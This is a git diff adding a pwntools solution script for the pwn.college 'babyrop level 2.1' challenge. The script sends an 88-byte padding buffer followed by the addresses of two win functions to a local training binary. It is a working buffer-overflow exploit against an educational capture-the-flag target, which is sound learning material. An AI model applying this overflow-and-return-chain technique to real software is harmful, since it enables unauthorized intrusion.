diff --git a/pwn_college/babyrop_level_2.1/a.py b/pwn_college/babyrop_level_2.1/a.py new file mode 100644 index 0000000..15b049b --- /dev/null +++ b/pwn_college/babyrop_level_2.1/a.py @@ -0,0 +1,17 @@ +#!/usr/bin/python3 + +from pwn import * + +context.binary = target = ELF("./babyrop_level_2_1", checksec=False) +r = process() + +# funcs +s = lambda a: r.sendline(a) + +# buf +buf = b"A"*88 +buf += p64(target.sym.win_stage_1) +buf += p64(target.sym.win_stage_2) +s(buf) + +r.interactive() \ No newline at end of file